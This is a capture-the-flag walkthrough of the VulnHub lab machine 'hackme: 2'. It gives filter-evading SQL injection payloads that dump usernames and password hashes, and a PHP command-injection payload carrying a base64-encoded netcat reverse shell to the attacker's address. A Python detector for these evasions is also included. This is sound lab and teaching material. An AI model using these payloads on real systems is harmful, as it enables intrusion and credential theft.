VulnHub | HACKME: 2 Walkthrough

Smile09

General Information

Name : hackme: 2
Difficulty: Medium
Date release: 6 Dec 2020
Author: x4bx54
Series: hackme
OS: Linux
IP: Automatically assigned (192.168.163.134)
Goal: Get root user access

Scanning

nmap -sC -sV 192.168.163.134

Enumeration

Let’s check the open port 80.
It displays a login page that requires a username and password.

Before going deeper, we can brute-force the directories on port 80 with DirBuster. From the scan results we found welcome.php, the home page shown after logging in.

Next, let's sign up at register.php to create a username and password that we can then use at login.php.

After logging in with those credentials, we are redirected to the welcome.php page.

The page displays a table with three columns: book ID, book Title, and Cost. From this we know that the underlying query returns three columns, which is what a UNION-based injection needs to match. Next, let's test for SQL injection vulnerabilities.

A basic test with a single quote (') shows nothing on the page that indicates a vulnerability. We tried various SQL injection techniques until we found references to payloads that use /**/ and #. The /**/ inline comment takes the place of a space in the query without breaking its syntax, which bypasses filters or web application firewalls that look for spaces or specific keywords. The # character starts a comment, so the remainder of the original query after our payload is ignored.

The SQL injection payload used is:

'/**/union/**/select/**/NULL, NULL, NULL#

Next, we try to find the names of the tables in the current database using this query:

'/**/union/**/select/**/table_name, NULL, NULL/**/FROM/**/information_schema.tables/**/WHERE/**/table_schema=database()#

The WHERE clause restricts information_schema.tables to rows whose table_schema equals the current database, since database() returns the name of the database in use. As a result, we find two tables, one of which (users) is worth exploring further.

Next, we list the columns of that table with the query:

'/**/union/**/select/**/column_name, NULL, NULL/**/FROM/**/information_schema.columns/**/WHERE/**/table_name='users'#

As a result, we find two credential columns that hold the login information: USER and pasword (the column really is spelled that way).

Let's dump the contents of the table with the query:

'/**/union/**/select/**/user, pasword, NULL/**/FROM/**/users#

Wow, we now have several usernames along with their hashed passwords.

We looked for a website that could crack the hash and eventually found one that returned the plaintext.

Then we log in with the admin username and the recovered password, and we reach the admin page.

From here, I tried the image upload feature. Uploading a file with a JPEG extension was accepted, but uploading anything with a different extension was rejected with a message stating which extension is allowed.

Next, we try the user search feature by entering a command such as system("ls"). First we enter it in the first-name field: the page simply echoes back what we typed.

Then we enter it in the last-name field: this time the page displays the output of the command.

From this we conclude that input in the last-name field is executed by the server, so we can use it to launch a reverse shell.

Gaining Access

Let's try entering the reverse shell command. It fails: it turns out the application strips the spaces from the input, so the command arrives as one run-together string.

After a long search for ways to get a command containing spaces through, we found a reference that works around the filter by base64-encoding the payload and letting the server decode it, since the encoded form contains no spaces. So we first base64-encode the reverse shell command:

cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnwvYmluL3NoIC1pIDI+JjF8bmMgMTkyLjE2OC4xNjMuMTI5IDU1NTUgPi90bXAvZg==

Combined with the decoding call, the final payload entered in the last-name field is:

system(base64_decode("cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnwvYmluL3NoIC1pIDI+JjF8bmMgMTkyLjE2OC4xNjMuMTI5IDU1NTUgPi90bXAvZg=="))

Result: success!
We have a shell on the system.
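As an added example (not part of the original post), here is a small Python detector for the two evasions used in this walkthrough: inline /**/ comments in place of spaces in the UNION SELECT payloads, and the system(base64_decode(...)) wrapper used in the last-name field. It normalizes each request (URL-decoding and collapsing comments) before matching, and contrasts that with a naive whitespace-only pattern; the sample requests and the rule names are constructed for this example.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample query strings (not from the original post), written as they
# would appear in a web server access log for the vulnerable pages.
SAMPLE_REQUESTS = {
    "benign": "search=Harry+Potter&page=2",
    "plain_sqli": "search=%27+union+select+NULL%2CNULL%2CNULL%23",
    "comment_sqli": "search=%27%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2FNULL%2C+NULL%2C+NULL%23",
    "schema_sqli": "search=%27/**/union/**/select/**/table_name,NULL,NULL"
                   "/**/FROM/**/information_schema.tables%23",
    "php_exec": "lastname=system(base64_decode(%22aWQ%3D%22))",
}

# A filter that only looks for "union<whitespace>select" never sees the
# /**/ variant, because an inline comment is not whitespace.
NAIVE_UNION = re.compile(r"union\s+select", re.IGNORECASE)

# Rules applied to the normalized text, so comment padding no longer matters.
RULES = {
    "sqli_union_select": re.compile(r"\bunion\s+(all\s+)?select\b"),
    "sqli_schema_enum": re.compile(r"\binformation_schema\.(tables|columns)\b"),
    "php_system_call": re.compile(r"\b(system|exec|shell_exec|passthru)\s*\("),
    "php_base64_wrapper": re.compile(r"\bbase64_decode\s*\("),
}

def normalize(raw):
    """URL-decode (up to twice), turn /*...*/ into a space, squeeze whitespace, lowercase."""
    text = raw
    for _ in range(2):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    text = re.sub(r"/\*.*?\*/", " ", text)
    return re.sub(r"\s+", " ", text).lower()

def naive_detect(raw):
    """Whitespace-only matching: the kind of filter /**/ is meant to slip past."""
    return bool(NAIVE_UNION.search(unquote_plus(raw)))

def detect(raw):
    """Return the names of all rules that fire on the normalized request."""
    text = normalize(raw)
    return [name for name, rx in RULES.items() if rx.search(text)]

if __name__ == "__main__":
    for label, qs in SAMPLE_REQUESTS.items():
        print(f"{label:13s} naive={naive_detect(qs)!s:5s} normalized={detect(qs)}")
```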

Privilege Escalation

Let's check the contents of each folder on the system.

After going through the folders one by one, we finally find the file that lets us gain root access.

Thank you for your time and attention in reading this article until the end. Until we meet again in another piece, take care and goodbye for now.